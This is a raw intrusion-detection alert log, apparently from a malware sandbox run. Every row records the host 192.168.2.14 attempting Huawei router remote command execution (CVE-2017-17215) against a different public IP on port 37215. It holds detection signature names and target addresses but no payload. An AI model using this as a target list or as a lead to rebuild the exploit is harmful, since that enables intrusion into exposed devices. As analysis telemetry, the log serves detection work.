                                                    07/10/24-08:26:49.795312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377437215192.168.2.1441.113.8.218
                                                    07/10/24-08:27:05.216046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155237215192.168.2.14157.240.128.90
                                                    07/10/24-08:26:49.911246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486637215192.168.2.14119.10.24.173
                                                    07/10/24-08:26:43.878190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722637215192.168.2.14143.12.148.173
                                                    07/10/24-08:27:11.612567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056237215192.168.2.14191.150.72.78
                                                    07/10/24-08:27:28.153609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613637215192.168.2.14197.92.39.63
                                                    07/10/24-08:26:59.551193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558637215192.168.2.1492.97.121.179
                                                    07/10/24-08:27:10.621059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.14182.87.219.179
                                                    07/10/24-08:27:22.845184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451837215192.168.2.14197.157.130.35
                                                    07/10/24-08:26:28.919298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934637215192.168.2.1441.17.96.77
                                                    07/10/24-08:26:43.861688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957237215192.168.2.14192.204.241.254
                                                    07/10/24-08:27:02.742561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412437215192.168.2.14197.223.246.241
                                                    07/10/24-08:27:10.629706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.1469.96.189.157
                                                    07/10/24-08:27:22.835160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485037215192.168.2.14197.196.189.144
                                                    07/10/24-08:27:22.765325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991637215192.168.2.14157.39.208.92
                                                    07/10/24-08:27:14.821258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.14157.19.124.229
                                                    07/10/24-08:26:47.774106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512237215192.168.2.1441.63.231.153
                                                    07/10/24-08:26:59.804848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5229437215192.168.2.1441.53.82.109
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557437215192.168.2.14157.27.208.113
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484237215192.168.2.1441.92.180.138
                                                    07/10/24-08:27:32.612334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.14157.113.131.240
                                                    07/10/24-08:26:47.974883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092637215192.168.2.14204.190.110.106
                                                    07/10/24-08:27:32.609585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763837215192.168.2.1441.150.254.67
                                                    07/10/24-08:26:43.932018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255037215192.168.2.14157.185.157.2
                                                    07/10/24-08:27:22.839204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309437215192.168.2.14157.208.207.84
                                                    07/10/24-08:27:22.498081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714037215192.168.2.14197.84.224.253
                                                    07/10/24-08:26:49.787588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282637215192.168.2.14191.44.32.131
                                                    07/10/24-08:27:14.846155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527037215192.168.2.14197.215.126.169
                                                    07/10/24-08:26:38.601192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714237215192.168.2.14197.175.36.173
                                                    07/10/24-08:26:57.682108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339237215192.168.2.14157.87.136.99
                                                    07/10/24-08:27:17.050369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580837215192.168.2.14157.232.241.92
                                                    07/10/24-08:26:29.819391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948037215192.168.2.14179.231.251.221
                                                    07/10/24-08:27:02.811235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504437215192.168.2.14157.216.230.237
                                                    07/10/24-08:26:49.805263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393637215192.168.2.1487.13.73.62
                                                    07/10/24-08:27:20.484132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630637215192.168.2.1441.53.199.120
                                                    07/10/24-08:26:49.805817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954037215192.168.2.14197.59.237.104
                                                    07/10/24-08:26:34.230716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296037215192.168.2.1441.84.124.149
                                                    07/10/24-08:26:11.522836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841837215192.168.2.14115.126.63.255
                                                    07/10/24-08:26:33.231077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249837215192.168.2.14118.44.66.210
                                                    07/10/24-08:26:41.525692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847437215192.168.2.1490.206.82.154
                                                    07/10/24-08:26:43.915899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913837215192.168.2.14151.74.111.108
                                                    07/10/24-08:26:48.004841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770637215192.168.2.1497.101.96.201
                                                    07/10/24-08:26:59.883274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932037215192.168.2.14197.116.176.158
                                                    07/10/24-08:27:11.522078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961037215192.168.2.1441.159.158.57
                                                    07/10/24-08:26:20.139461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430037215192.168.2.14197.128.223.165
                                                    07/10/24-08:26:23.347841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173437215192.168.2.14197.76.61.119
                                                    07/10/24-08:26:15.879292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486237215192.168.2.14197.82.176.188
                                                    07/10/24-08:26:43.835820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.1441.104.249.236
                                                    07/10/24-08:27:24.973099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774037215192.168.2.1441.6.10.163
                                                    07/10/24-08:27:13.761850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951037215192.168.2.1441.241.148.238
                                                    07/10/24-08:26:43.653276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275837215192.168.2.1440.93.116.157
                                                    07/10/24-08:26:29.880406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083237215192.168.2.1461.42.227.233
                                                    07/10/24-08:26:45.619051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025637215192.168.2.1460.179.33.202
                                                    07/10/24-08:27:32.545025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442237215192.168.2.14197.235.7.104
                                                    07/10/24-08:26:11.558089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816637215192.168.2.1441.90.109.21
                                                    07/10/24-08:27:33.752992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290437215192.168.2.14197.128.163.31
                                                    07/10/24-08:26:11.463338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422437215192.168.2.1441.254.159.206
                                                    07/10/24-08:26:14.822403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458437215192.168.2.14141.166.114.81
                                                    07/10/24-08:26:13.647061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992437215192.168.2.1441.165.59.61
                                                    07/10/24-08:27:02.825346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234837215192.168.2.1441.83.253.201
                                                    07/10/24-08:26:28.842346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201037215192.168.2.14197.244.54.244
                                                    07/10/24-08:26:38.577437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085437215192.168.2.14157.221.217.59
                                                    07/10/24-08:27:17.111438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380637215192.168.2.14186.125.32.188
                                                    07/10/24-08:26:53.124303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619037215192.168.2.1441.236.236.48
                                                    07/10/24-08:26:14.720259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549037215192.168.2.1466.140.103.139
                                                    07/10/24-08:26:43.655203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14197.149.173.106
                                                    07/10/24-08:27:28.046169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579237215192.168.2.14153.192.190.156
                                                    07/10/24-08:26:43.713774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205837215192.168.2.1427.91.250.152
                                                    07/10/24-08:26:36.373658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615437215192.168.2.14187.195.102.4
                                                    07/10/24-08:26:33.265037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074037215192.168.2.1441.29.78.98
                                                    07/10/24-08:26:14.762388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558237215192.168.2.14157.105.127.136
                                                    07/10/24-08:26:43.932722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717837215192.168.2.14197.12.97.188
                                                    07/10/24-08:26:17.974548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347837215192.168.2.1453.218.247.119
                                                    07/10/24-08:26:20.177629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647837215192.168.2.14157.58.239.218
                                                    07/10/24-08:26:41.557589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491437215192.168.2.14197.0.96.54
                                                    07/10/24-08:26:52.060029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478237215192.168.2.14128.197.46.188
                                                    07/10/24-08:27:07.365607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230837215192.168.2.14197.122.111.127
                                                    07/10/24-08:27:27.029781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919037215192.168.2.14197.244.92.224
                                                    07/10/24-08:27:30.475400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939437215192.168.2.1495.96.186.3
                                                    07/10/24-08:27:10.601201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770037215192.168.2.1441.147.5.102
                                                    07/10/24-08:26:47.945197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756237215192.168.2.14197.57.24.206
                                                    07/10/24-08:26:31.093186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222837215192.168.2.14157.105.152.1
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671637215192.168.2.1441.243.155.214
                                                    07/10/24-08:27:02.859176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575637215192.168.2.1441.38.22.19
                                                    07/10/24-08:27:30.433445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988837215192.168.2.14157.137.140.113
                                                    07/10/24-08:26:52.005613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445037215192.168.2.14157.72.231.43
                                                    07/10/24-08:27:10.615348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870837215192.168.2.14157.235.59.49
                                                    07/10/24-08:27:17.048975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872637215192.168.2.1423.103.11.115
                                                    07/10/24-08:26:57.501573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728637215192.168.2.14197.92.59.68
                                                    07/10/24-08:26:28.853209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516437215192.168.2.1441.187.40.35
                                                    07/10/24-08:26:57.551648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610037215192.168.2.14184.83.107.202
                                                    07/10/24-08:27:27.040022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4594637215192.168.2.14197.94.113.157
                                                    07/10/24-08:26:47.994983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609037215192.168.2.1441.221.59.71
                                                    07/10/24-08:26:13.845095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616037215192.168.2.1441.2.245.226
                                                    07/10/24-08:26:53.202675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.14197.89.141.13
                                                    07/10/24-08:27:14.841554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967037215192.168.2.14157.158.108.82
                                                    07/10/24-08:27:17.005149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991437215192.168.2.14135.105.59.26
                                                    07/10/24-08:26:17.980913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360237215192.168.2.1441.9.89.204
                                                    07/10/24-08:26:36.372350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869037215192.168.2.14202.29.141.13
                                                    07/10/24-08:26:20.187886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697037215192.168.2.14197.3.52.146
                                                    07/10/24-08:27:17.008672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.14157.188.119.64
                                                    07/10/24-08:27:30.533140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268037215192.168.2.1438.180.27.194
                                                    07/10/24-08:27:32.525366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467837215192.168.2.14197.150.252.38
                                                    07/10/24-08:26:22.288558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460837215192.168.2.14197.37.147.22
                                                    07/10/24-08:26:28.878894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360237215192.168.2.14197.220.193.236
                                                    07/10/24-08:27:23.937320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755037215192.168.2.14157.214.40.134
                                                    07/10/24-08:26:33.248945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122837215192.168.2.1484.214.205.194
                                                    07/10/24-08:26:34.211493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739237215192.168.2.1441.0.31.10
                                                    07/10/24-08:27:30.530198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452437215192.168.2.1441.188.86.44
                                                    07/10/24-08:27:14.894597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654437215192.168.2.1481.48.141.181
                                                    07/10/24-08:26:45.633104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968437215192.168.2.14197.54.51.204
                                                    07/10/24-08:27:32.556430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672837215192.168.2.1438.111.190.64
                                                    07/10/24-08:27:14.812772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664837215192.168.2.14196.199.136.229
                                                    07/10/24-08:26:34.229660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517037215192.168.2.1441.159.148.175
                                                    07/10/24-08:27:17.044881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715237215192.168.2.14197.39.228.163
                                                    07/10/24-08:27:24.891273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332637215192.168.2.1441.76.16.195
                                                    07/10/24-08:27:10.723777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025237215192.168.2.14157.223.210.119
                                                    07/10/24-08:26:38.559364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874637215192.168.2.1438.47.236.143
                                                    07/10/24-08:26:25.442977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175837215192.168.2.14197.84.182.193
                                                    07/10/24-08:26:33.244914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360237215192.168.2.14157.167.68.153
                                                    07/10/24-08:27:28.146093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645637215192.168.2.1441.168.46.235
                                                    07/10/24-08:26:41.429574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615637215192.168.2.14157.60.98.102
                                                    07/10/24-08:26:36.346180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827037215192.168.2.14157.111.246.209
                                                    07/10/24-08:26:43.927826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638437215192.168.2.1443.151.43.194
                                                    07/10/24-08:26:28.903280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939637215192.168.2.14197.219.47.186
                                                    07/10/24-08:26:43.805226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120237215192.168.2.1441.141.36.110
                                                    07/10/24-08:27:02.686169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382237215192.168.2.14131.175.122.205
                                                    07/10/24-08:27:02.811235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092237215192.168.2.14197.151.93.208
                                                    07/10/24-08:27:19.163941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117037215192.168.2.1441.211.244.63
                                                    07/10/24-08:26:14.828942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253037215192.168.2.14197.30.134.164
                                                    07/10/24-08:26:41.324840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537637215192.168.2.1441.4.193.107
                                                    07/10/24-08:27:24.878204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529437215192.168.2.1441.34.182.57
                                                    07/10/24-08:27:30.527046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370837215192.168.2.1441.105.152.235
                                                    07/10/24-08:27:10.590794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178437215192.168.2.1412.119.152.189
                                                    07/10/24-08:26:55.330413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394637215192.168.2.14197.200.152.233
                                                    07/10/24-08:27:30.499089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525837215192.168.2.1441.245.94.229
                                                    07/10/24-08:26:57.627051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467837215192.168.2.1441.28.164.207
                                                    07/10/24-08:26:20.123925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676237215192.168.2.1441.199.186.188
                                                    07/10/24-08:26:29.768210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812037215192.168.2.14157.138.74.251
                                                    07/10/24-08:27:07.298138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859437215192.168.2.14197.34.79.58
                                                    07/10/24-08:27:32.619838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355037215192.168.2.14144.243.147.102
                                                    07/10/24-08:26:22.298468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462037215192.168.2.14157.189.9.34
                                                    07/10/24-08:26:29.851585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838837215192.168.2.14157.98.214.125
                                                    07/10/24-08:27:32.614607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909037215192.168.2.1441.72.223.23
                                                    07/10/24-08:26:31.108288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058237215192.168.2.14157.74.19.184
                                                    07/10/24-08:26:34.202822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586637215192.168.2.1441.19.83.74
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282437215192.168.2.14197.147.101.74
                                                    07/10/24-08:26:55.432680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830037215192.168.2.14161.184.41.18
                                                    07/10/24-08:27:08.417840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781437215192.168.2.14197.144.191.228
                                                    07/10/24-08:26:17.990619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509037215192.168.2.14197.10.0.134
                                                    07/10/24-08:26:42.358435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503037215192.168.2.1441.65.104.202
                                                    07/10/24-08:27:33.744947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760237215192.168.2.14157.43.179.49
                                                    07/10/24-08:27:33.823408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551037215192.168.2.14197.147.80.45
                                                    07/10/24-08:27:02.949585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119037215192.168.2.14157.103.101.157
                                                    07/10/24-08:26:59.761558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523837215192.168.2.14197.83.219.155
                                                    07/10/24-08:26:14.803775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969037215192.168.2.14197.36.239.34
                                                    07/10/24-08:26:11.165581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768437215192.168.2.14157.72.125.10
                                                    07/10/24-08:26:26.573174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327237215192.168.2.14157.228.127.2
                                                    07/10/24-08:27:08.392064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774437215192.168.2.14197.97.157.97
                                                    07/10/24-08:26:59.880494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731637215192.168.2.14197.151.7.214
                                                    07/10/24-08:27:05.222461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714437215192.168.2.14197.165.221.186
                                                    07/10/24-08:26:14.817942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358437215192.168.2.14188.102.70.72
                                                    07/10/24-08:26:31.046774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333637215192.168.2.1417.184.85.117
                                                    07/10/24-08:26:43.825233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415437215192.168.2.14197.86.91.195
                                                    07/10/24-08:26:59.724470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719637215192.168.2.1441.182.170.176
                                                    07/10/24-08:27:23.937541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526437215192.168.2.1441.202.45.195
                                                    07/10/24-08:27:10.717127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632237215192.168.2.14197.23.84.128
                                                    07/10/24-08:27:30.535069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845637215192.168.2.14197.242.84.50
                                                    07/10/24-08:26:25.501206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801437215192.168.2.14197.236.214.253
                                                    07/10/24-08:26:41.593375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646837215192.168.2.14197.174.246.24
                                                    07/10/24-08:27:05.160088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755437215192.168.2.1463.183.97.175
                                                    07/10/24-08:27:28.179104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348837215192.168.2.14160.164.37.59
                                                    07/10/24-08:26:47.920289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765837215192.168.2.1441.62.178.111
                                                    07/10/24-08:26:25.453696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395837215192.168.2.14197.110.46.115
                                                    07/10/24-08:26:17.992846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993237215192.168.2.1441.226.196.153
                                                    07/10/24-08:26:52.036336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566837215192.168.2.14197.240.127.137
                                                    07/10/24-08:26:59.560985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492237215192.168.2.14197.56.2.158
                                                    07/10/24-08:26:59.612938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018837215192.168.2.14211.215.9.162
                                                    07/10/24-08:26:53.177973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700437215192.168.2.14197.14.43.202
                                                    07/10/24-08:27:07.369832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015437215192.168.2.1441.147.27.94
                                                    07/10/24-08:27:17.054152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974437215192.168.2.1441.102.190.42
                                                    07/10/24-08:27:32.577578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018437215192.168.2.14160.46.16.108
                                                    07/10/24-08:26:55.393096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905437215192.168.2.14197.77.19.103
                                                    07/10/24-08:27:33.828822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702637215192.168.2.1467.167.180.22
                                                    07/10/24-08:26:23.342847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028437215192.168.2.1441.134.73.129
                                                    07/10/24-08:27:16.996210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631637215192.168.2.1441.200.10.234
